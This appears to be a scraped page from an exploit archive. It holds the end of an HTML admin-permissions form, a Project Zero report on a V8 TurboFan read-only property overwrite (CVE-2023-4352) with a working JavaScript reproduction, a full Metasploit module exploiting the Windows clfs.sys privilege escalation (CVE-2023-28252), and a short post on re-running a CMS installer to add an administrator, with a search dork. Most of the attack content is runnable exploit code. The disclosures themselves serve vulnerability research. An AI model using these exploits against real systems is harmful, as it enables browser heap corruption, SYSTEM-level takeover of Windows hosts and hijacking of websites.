style="border-collapse:collapse;width:100%;"><br /> <tr><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Backup Istantaneo</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_14" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_14" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_14" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_14" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_14" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Backup automatico</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_27" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_27" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_27" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_27" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_27" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>GESTIONE USER ADMIN</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>User Admin</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_5" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_5" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_5" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_5" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_5" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>GESTIONE TROVAPREZZI</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Genera File Trovaprezzi</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_30" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_30" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_30" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_30" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_30" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Articoli Trovaprezzi</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_31" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_31" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_31" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_31" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_31" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="formdati"> <br /> <tr><br /> <td><input type="submit" value="Invia" class="enterbutton" style="margin:20px 0px 0px 32px;"/></td><br /> <td></td><br /> </tr><br /> </table><br /> <br /> </form><br /> </div> <br /> </div><br /></td><br /></tr><br /></table><br /><!-- ******* fine parte centrale pagina *********** --><br /></div><br /><!-- ******** fine del CONTENT *************** --><br /></body></html><br /><br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>Chrome: Read-only property overwrite in TurboFan<br /><br />VULNERABILITY DETAILS<br />While collecting information for a property store, TurboFan bails out if the property isn't writable[2]. Unfortunately, the branch condition[1] does not include one of the store modes, namely `kDefine`. This allows an attacker to overwrite arbitrary non-configurable, read-only properties. It takes a few extra steps to convince TurboFan to compile a vulnerable function -- see the reproduction case section.<br /><br />This issue can be abused to trigger a type confusion in `JsonStringifier::Serialize_`. The function assumes that a `JSRawJson` object can only have a string as its `rawJSON` property value, because `JSRawJson::Create` freezes the object[3] before returning it to the user. Therefore, `Serialize_` doesn't perform a type check before casting the result of `GetProperty` to the string type[4]. `AppendString` might then attempt to concatenate the bogus string[5], corrupting the heap.<br /><br /><br />REFERENCES<br />https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/access-info.cc;drc=5992439d25f71ce29efa8db1c699b99e8773d41f;l=708<br />```<br />PropertyAccessInfo AccessInfoFactory::ComputePropertyAccessInfo(<br /> MapRef map, NameRef name, AccessMode access_mode) const {<br />[...]<br /> while (true) {<br /> PropertyDetails details = PropertyDetails::Empty();<br /> InternalIndex index = InternalIndex::NotFound();<br /> if (!TryLoadPropertyDetails(map, holder, name, &index, &details)) {<br /> return Invalid();<br /> }<br /><br /> if (index.is_found()) {<br /> if (access_mode == AccessMode::kStore || // *** 1 ***<br /> access_mode == AccessMode::kStoreInLiteral) {<br /> DCHECK(!map.is_dictionary_map());<br /><br /> // Don't bother optimizing stores to read-only properties.<br /> if (details.IsReadOnly()) return Invalid(); // *** 2 ***<br />[...]<br />}<br />```<br /><br />https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-raw-json.cc;drc=93e93056e3849e78a8c77fe6fd0c2a0983a0b3f4;l=17<br />```<br />MaybeHandle<JSRawJson> JSRawJson::Create(Isolate* isolate,<br /> Handle<Object> text) {<br /> DCHECK(v8_flags.harmony_json_parse_with_source);<br /> Handle<String> json_string;<br /> ASSIGN_RETURN_ON_EXCEPTION(isolate, json_string,<br /> Object::ToString(isolate, text), JSRawJson);<br /> Handle<String> flat = String::Flatten(isolate, json_string);<br /> if (String::IsOneByteRepresentationUnderneath(*flat)) {<br /> if (!JsonParser<uint8_t>::CheckRawJson(isolate, flat)) {<br /> DCHECK(isolate->has_pending_exception());<br /> return MaybeHandle<JSRawJson>();<br /> }<br /> } else {<br /> if (!JsonParser<uint16_t>::CheckRawJson(isolate, flat)) {<br /> DCHECK(isolate->has_pending_exception());<br /> return MaybeHandle<JSRawJson>();<br /> }<br /> }<br /> Handle<JSObject> result =<br /> isolate->factory()->NewJSObjectFromMap(isolate->js_raw_json_map());<br /> result->InObjectPropertyAtPut(JSRawJson::kRawJsonInitialIndex, *flat);<br /> JSObject::SetIntegrityLevel(isolate, result, FROZEN, kThrowOnError).Check(); // *** 3 ***<br /> return Handle<JSRawJson>::cast(result);<br />}<br />```<br /><br />https://source.chromium.org/chromium/chromium/src/+/main:v8/src/json/json-stringifier.cc;drc=221294ce14cb14f84afa156f3c590700bc615dc1;l=530<br />```<br />JsonStringifier::Result JsonStringifier::Serialize_(Handle<Object> object,<br /> bool comma,<br /> Handle<Object> key) {<br />[...]<br /> InstanceType instance_type =<br /> HeapObject::cast(*object).map(cage_base).instance_type();<br /> switch (instance_type) {<br />[...]<br /> case JS_RAW_JSON_TYPE:<br /> DCHECK(v8_flags.harmony_json_parse_with_source);<br /> if (deferred_string_key) SerializeDeferredKey(comma, key);<br /> {<br /> Handle<JSRawJson> raw_json_obj = Handle<JSRawJson>::cast(object);<br /> Handle<String> raw_json;<br /> if (raw_json_obj->HasInitialLayout(isolate_)) {<br /> // Fast path: the object returned by JSON.rawJSON has its initial map<br /> // intact.<br /> raw_json = Handle<String>::cast(handle(<br /> raw_json_obj->InObjectPropertyAt(JSRawJson::kRawJsonInitialIndex),<br /> isolate_));<br /> } else {<br /> // Slow path: perform a property get for \"rawJSON\". Because raw JSON<br /> // objects are created frozen, it is still guaranteed that there will<br /> // be a property named \"rawJSON\" that is a String. Their initial maps<br /> // only change due to VM-internal operations like being optimized for<br /> // being used as a prototype.<br /> raw_json = Handle<String>::cast( // *** 4 ***<br /> JSObject::GetProperty(isolate_, raw_json_obj,<br /> isolate_->factory()->raw_json_string())<br /> .ToHandleChecked());<br /> }<br /> builder_.AppendString(raw_json); // *** 5 ***<br /> }<br />[...]<br />}<br />```<br /><br /><br />VERSION<br />Google Chrome 114.0.5735.90 (Official Build) <br />V8 version 11.6.0<br /><br /><br />REPRODUCTION CASE<br />```<br />const PROP_NAME = \"rawJSON\",<br /> PROP_VALUE = 0x21212121; // Will be interpreted as a compressed pointer by `Serialize_`.<br /><br />let define_property_holder = {};<br />define_property_holder.for_deprecation = 1; // See below.<br /><br />function ReturnHolder() { return define_property_holder; };<br />class Trigger extends ReturnHolder { // Extend a function that returns a value so that it possible<br /> // to store on an existing object.<br /><br /> [PROP_NAME] = ( // A keyed class property initializer is translated to a `kDefine` store.<br /><br /> this[PROP_NAME], // The store operation performed on the target object will always throw in<br /> // the interpreter, so the object's map won't be added to the feedback slot.<br /> // Emit a load so that its feedback map can be reused by the store.<br /> PROP_VALUE<br /> )<br />};<br /><br />for (let i = 0; i < 10; ++i)<br /> new Trigger; // The store operation has to have a non-empty feedback slot. Use a regular object<br /> // with the writable target property for that.<br /><br />define_property_holder.for_deprecation = 1.1; // Deprecate the map in the feedback vector so that<br /> // it's discarded by TurboFan.<br /><br />define_property_holder = JSON.rawJSON(\"1\"); // The special target object.<br /><br />try { new Trigger } catch { } // Add the target object map to the load operation's feedback slot.<br /><br />%OptimizeFunctionOnNextCall(Trigger);<br />new Trigger;<br /><br />JSON.stringify(define_property_holder);<br />```<br /><br /><br />CREDIT INFORMATION<br />Sergei Glazunov of Google Project Zero<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-09-05.<br /><br /><br />Related CVE Numbers: CVE-2023-4352.<br /><br /><br /><br />Found by: glazunov@google.com<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = GoodRanking<br /><br /> include Msf::Exploit::Local::WindowsKernel<br /> include Msf::Post::File<br /> include Msf::Post::Windows::Priv<br /> include Msf::Post::Windows::Process<br /> include Msf::Post::Windows::ReflectiveDLLInjection<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Post::Windows::Version<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> {<br /> 'Name' => 'Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability',<br /> 'Description' => %q{<br /> A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on<br /> Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.<br /><br /> The clfs.sys driver contains a function CreateLogFile that is used to create<br /> open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which<br /> contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a<br /> .blf file. However, these files can be edited with CreateFileA or with fopen and then modified with<br /> WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.<br /><br /> This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique<br /> mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of<br /> bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe<br /> that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially<br /> crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.<br /><br /> The exploits creates a controlled memory space by first looping over the CreatePipe function to<br /> to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of<br /> pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the<br /> 0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.<br /><br /> This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in<br /> depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Ricardo Narvaja', # Original PoC (@ricnar456)<br /> 'Esteban.kazimirow', # Original PoC (@solidclt)<br /> 'jheysel-r7' # msf module<br /> ],<br /> 'Arch' => [ ARCH_X64 ],<br /> 'Platform' => 'win',<br /> 'SessionTypes' => [ 'meterpreter' ],<br /> 'DefaultOptions' => {<br /> 'EXITFUNC' => 'thread'<br /> },<br /> 'Targets' => [<br /> [ 'Windows x64', { 'Arch' => ARCH_X64 } ]<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2023-28252' ],<br /> [ 'URL', 'https://github.com/fortra/CVE-2023-28252' ]<br /> ],<br /> 'DisclosureDate' => '2023-04-11',<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => true,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [UNRELIABLE_SESSION], # Should always return a session on the first run but after that a session is not guaranteed<br /> 'SideEffects' => []<br /> },<br /> 'Compat' => {<br /> 'Meterpreter' => {<br /> 'Commands' => %w[<br /> stdapi_railgun_api<br /> ]<br /> }<br /> }<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> unless session.platform == 'windows'<br /> # Non-Windows systems are definitely not affected.<br /> return Exploit::CheckCode::Safe<br /> end<br /><br /> file_path = get_env('WINDIR') + '\\system32\\drivers\\clfs.sys'<br /> unless file?(file_path)<br /> return Exploit::CheckCode::Safe('The target system does not have clfs.sys in system32\\drivers\\')<br /> end<br /><br /> version = get_version_info<br /> if version.build_number.between?(Msf::WindowsVersion::Win10_20H2, Msf::WindowsVersion::Win10_21H2) || version.build_number == Msf::WindowsVersion::Win11_21H2 || version.build_number == Msf::WindowsVersion::Server2022<br /> return CheckCode::Appears("The target is running windows version: #{version.build_number} which has a vulnerable version of clfs.sys installed by default")<br /> end<br /><br /> CheckCode::Safe<br /> end<br /><br /> def exploit<br /> if is_system?<br /> fail_with(Failure::None, 'Session is already elevated')<br /> end<br /><br /> if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86<br /> fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')<br /> elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86<br /> fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')<br /> elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64<br /> fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')<br /> end<br /><br /> encoded_payload = payload.encoded<br /> execute_dll(<br /> ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-28252', 'CVE-2023-28252.x64.dll'),<br /> [encoded_payload.length].pack('I<') + encoded_payload<br /> )<br /><br /> print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')<br /> end<br />end<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : iSmile Soft CMS v0.3.0 Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.helpernt.com/ |<br />| # Dork : JamalCom هذا السكربت مبرمج بواسطة |<br />====================================================================================================================================<br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The installation file allows you to re-install the script and add a new manager, and the reason is due to the designer. <br /> It is not recommended to delete the installation folder, and the user does not pay attention to deleting the installation file.<br /><br />[+] use payload : /install.php?etape=3<br /><br />[+] http://127.0.0.1/iSmile/install.php?etape=3<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
Archives
Categories
- All Exploits 4095
- Remote Code Execution
- SQL Injection
- Command Injection
- Local File Inclusion
- Cross Site Scripting
- Privilege Escalation
- Denial Of Service
- Authentication Bypass
- Buffer Overflow